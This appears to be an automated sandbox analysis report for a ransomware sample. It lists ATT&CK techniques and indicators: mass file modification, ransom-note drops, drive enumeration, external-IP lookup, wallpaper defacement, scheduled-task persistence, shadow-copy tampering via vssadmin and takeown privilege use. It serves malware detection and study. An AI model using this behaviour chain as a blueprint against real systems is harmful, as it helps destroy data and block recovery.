File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2WZE2OQ2\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\A08CGSZX\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exeb3EHwRvV64.exe

description	ioc	process
File opened (read-only)	\??\K:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\E:	b3EHwRvV64.exe
File opened (read-only)	\??\G:	b3EHwRvV64.exe
File opened (read-only)	\??\I:	b3EHwRvV64.exe
File opened (read-only)	\??\K:	b3EHwRvV64.exe
File opened (read-only)	\??\P:	b3EHwRvV64.exe
File opened (read-only)	\??\U:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\G:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\F:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\J:	b3EHwRvV64.exe
File opened (read-only)	\??\N:	b3EHwRvV64.exe
File opened (read-only)	\??\W:	b3EHwRvV64.exe
File opened (read-only)	\??\W:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\R:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\N:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\L:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\I:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\L:	b3EHwRvV64.exe
File opened (read-only)	\??\M:	b3EHwRvV64.exe
File opened (read-only)	\??\O:	b3EHwRvV64.exe
File opened (read-only)	\??\Z:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\X:	b3EHwRvV64.exe
File opened (read-only)	\??\S:	b3EHwRvV64.exe
File opened (read-only)	\??\J:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\V:	b3EHwRvV64.exe
File opened (read-only)	\??\Y:	b3EHwRvV64.exe
File opened (read-only)	\??\Y:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\V:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\P:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\M:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\T:	b3EHwRvV64.exe
File opened (read-only)	\??\Z:	b3EHwRvV64.exe
File opened (read-only)	\??\X:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\A:	b3EHwRvV64.exe
File opened (read-only)	\??\H:	b3EHwRvV64.exe
File opened (read-only)	\??\Q:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\O:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\H:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\F:	b3EHwRvV64.exe
File opened (read-only)	\??\Q:	b3EHwRvV64.exe
File opened (read-only)	\??\R:	b3EHwRvV64.exe
File opened (read-only)	\??\U:	b3EHwRvV64.exe
File opened (read-only)	\??\S:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\E:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\B:	b3EHwRvV64.exe
File opened (read-only)	\??\T:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 myexternalip.com

flow	ioc
7	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\77XyyPCo.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Anadyr	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\SystemV\YST9	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\cmm\GRAY.pf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\fi.pak	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\alt-rt.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Midway	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Yakutat	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\de-DE\Chess.exe.mui	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\win32\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Minesweeper\de-DE\Minesweeper.exe.mui	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\notification_helper.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\bin\java.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\ja-JP\SpiderSolitaire.exe.mui	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Macau	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\v8_context_snapshot.bin	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\VisualElements\SmallLogoCanary.png	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Swift_Current	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\More Games\de-DE\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

768 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

948 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeb3EHwRvV64.exe

pid process

1948 powershell.exe
1556 b3EHwRvV64.exe
1556 b3EHwRvV64.exe
1556 b3EHwRvV64.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

b3EHwRvV64.exe

pid process

1556 b3EHwRvV64.exe

pid	process
768	schtasks.exe

pid	process
948	vssadmin.exe

pid	process
1948	powershell.exe
1556	b3EHwRvV64.exe
1556	b3EHwRvV64.exe
1556	b3EHwRvV64.exe

pid	process
1556	b3EHwRvV64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeb3EHwRvV64.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	1556	b3EHwRvV64.exe
Token: SeLoadDriverPrivilege	1556	b3EHwRvV64.exe
Token: SeTakeOwnershipPrivilege	1580	takeown.exe
Token: SeTakeOwnershipPrivilege	468	takeown.exe
Token: SeTakeOwnershipPrivilege	1608	takeown.exe
Token: SeTakeOwnershipPrivilege	1948	takeown.exe
Token: SeTakeOwnershipPrivilege	1048	takeown.exe
Token: SeTakeOwnershipPrivilege	1116	takeown.exe
Token: SeTakeOwnershipPrivilege	568	takeown.exe
Token: SeTakeOwnershipPrivilege	992	takeown.exe
Token: SeTakeOwnershipPrivilege	604	takeown.exe
Token: SeTakeOwnershipPrivilege	2548	takeown.exe
Token: SeTakeOwnershipPrivilege	2640	takeown.exe
Token: SeTakeOwnershipPrivilege	2728	takeown.exe
Token: SeTakeOwnershipPrivilege	2816	takeown.exe
Token: SeTakeOwnershipPrivilege	2908	takeown.exe
Token: SeBackupPrivilege	2940	vssvc.exe
Token: SeRestorePrivilege	2940	vssvc.exe
Token: SeAuditPrivilege	2940	vssvc.exe
Token: SeTakeOwnershipPrivilege	1048	takeown.exe
Token: SeTakeOwnershipPrivilege	2080	takeown.exe
Token: SeTakeOwnershipPrivilege	308	takeown.exe
Token: SeTakeOwnershipPrivilege	2328	takeown.exe
Token: SeTakeOwnershipPrivilege	2412	takeown.exe
Token: SeTakeOwnershipPrivilege	2424	takeown.exe
Token: SeTakeOwnershipPrivilege	2516	takeown.exe
Token: SeTakeOwnershipPrivilege	2608	takeown.exe
Token: SeTakeOwnershipPrivilege	1496	takeown.exe
Token: SeTakeOwnershipPrivilege	1568	takeown.exe
Token: SeTakeOwnershipPrivilege	2816	takeown.exe
Token: SeTakeOwnershipPrivilege	584	takeown.exe
Token: SeTakeOwnershipPrivilege	2888	takeown.exe
Token: SeTakeOwnershipPrivilege	3068	takeown.exe
Token: SeTakeOwnershipPrivilege	2200	takeown.exe
Token: SeTakeOwnershipPrivilege	2264	takeown.exe
Token: SeTakeOwnershipPrivilege	2352	takeown.exe
Token: SeTakeOwnershipPrivilege	2460	takeown.exe
Token: SeTakeOwnershipPrivilege	920	takeown.exe
Token: SeTakeOwnershipPrivilege	2340	takeown.exe
Token: SeTakeOwnershipPrivilege	1608	takeown.exe
Token: SeTakeOwnershipPrivilege	2928	takeown.exe
Token: SeTakeOwnershipPrivilege	3016	takeown.exe
Token: SeTakeOwnershipPrivilege	2104	takeown.exe
Token: SeTakeOwnershipPrivilege	2212	takeown.exe
Token: SeTakeOwnershipPrivilege	2264	takeown.exe
Token: SeTakeOwnershipPrivilege	2308	takeown.exe
Token: SeTakeOwnershipPrivilege	2344	takeown.exe
Token: SeTakeOwnershipPrivilege	2664	takeown.exe
Token: SeTakeOwnershipPrivilege	2732	takeown.exe
Token: SeTakeOwnershipPrivilege	2700	takeown.exe
Token: SeTakeOwnershipPrivilege	1252	takeown.exe
Token: SeTakeOwnershipPrivilege	1568	takeown.exe
Token: SeTakeOwnershipPrivilege	2828	takeown.exe
Token: SeTakeOwnershipPrivilege	2884	takeown.exe
Token: SeTakeOwnershipPrivilege	2948	takeown.exe
Token: SeTakeOwnershipPrivilege	1100	takeown.exe
Token: SeTakeOwnershipPrivilege	2080	takeown.exe
Token: SeTakeOwnershipPrivilege	2116	takeown.exe
Token: SeIncreaseQuotaPrivilege	2228	WMIC.exe
Token: SeSecurityPrivilege	2228	WMIC.exe
Token: SeTakeOwnershipPrivilege	2228	WMIC.exe
Token: SeLoadDriverPrivilege	2228	WMIC.exe
Token: SeSystemProfilePrivilege	2228	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.execmd.execmd.execmd.exewscript.execmd.execmd.exetaskeng.execmd.exe

description	pid	process	target process
PID 1184 wrote to memory of 1392	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1392	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1392	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1392	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1336	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWRDmPHs.exe
PID 1184 wrote to memory of 1336	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWRDmPHs.exe
PID 1184 wrote to memory of 1336	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWRDmPHs.exe
PID 1184 wrote to memory of 1336	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWRDmPHs.exe
PID 1184 wrote to memory of 568	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 568	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 568	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 568	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 568 wrote to memory of 1948	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 1948	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 1948	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 1948	568	cmd.exe	powershell.exe
PID 1184 wrote to memory of 1720	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1720	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1720	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1720	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 688	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 688	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 688	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 688	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1720 wrote to memory of 1528	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1528	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1528	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1528	1720	cmd.exe	reg.exe
PID 688 wrote to memory of 2028	688	cmd.exe	wscript.exe
PID 688 wrote to memory of 2028	688	cmd.exe	wscript.exe
PID 688 wrote to memory of 2028	688	cmd.exe	wscript.exe
PID 688 wrote to memory of 2028	688	cmd.exe	wscript.exe
PID 1720 wrote to memory of 1508	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1508	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1508	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1508	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1280	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1280	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1280	1720	cmd.exe	reg.exe
PID 1720 wrote to memory of 1280	1720	cmd.exe	reg.exe
PID 2028 wrote to memory of 1708	2028	wscript.exe	cmd.exe
PID 2028 wrote to memory of 1708	2028	wscript.exe	cmd.exe
PID 2028 wrote to memory of 1708	2028	wscript.exe	cmd.exe
PID 2028 wrote to memory of 1708	2028	wscript.exe	cmd.exe
PID 1708 wrote to memory of 768	1708	cmd.exe	schtasks.exe
PID 1708 wrote to memory of 768	1708	cmd.exe	schtasks.exe
PID 1708 wrote to memory of 768	1708	cmd.exe	schtasks.exe
PID 1708 wrote to memory of 768	1708	cmd.exe	schtasks.exe
PID 2028 wrote to memory of 1648	2028	wscript.exe	cmd.exe
PID 2028 wrote to memory of 1648	2028	wscript.exe	cmd.exe
PID 2028 wrote to memory of 1648	2028	wscript.exe	cmd.exe
